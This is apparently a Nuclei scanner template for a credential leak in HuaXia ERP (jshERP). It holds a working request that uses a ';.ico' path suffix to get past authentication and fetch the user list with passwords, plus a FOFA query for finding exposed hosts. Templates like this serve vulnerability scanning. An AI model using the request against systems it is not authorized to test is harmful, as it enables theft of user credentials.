id: HuaXia-ERP-leaked-password

info:
  name: 华夏ERP账号密码泄露漏
  author: changge
  severity: info
  description: 华夏ERP账号密码泄露漏
  metadata:
    fofa-query: "jshERP-boot" 
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |
        GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Accept: */*


    matchers-condition: and
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains(body, "password") && status_code == 200'
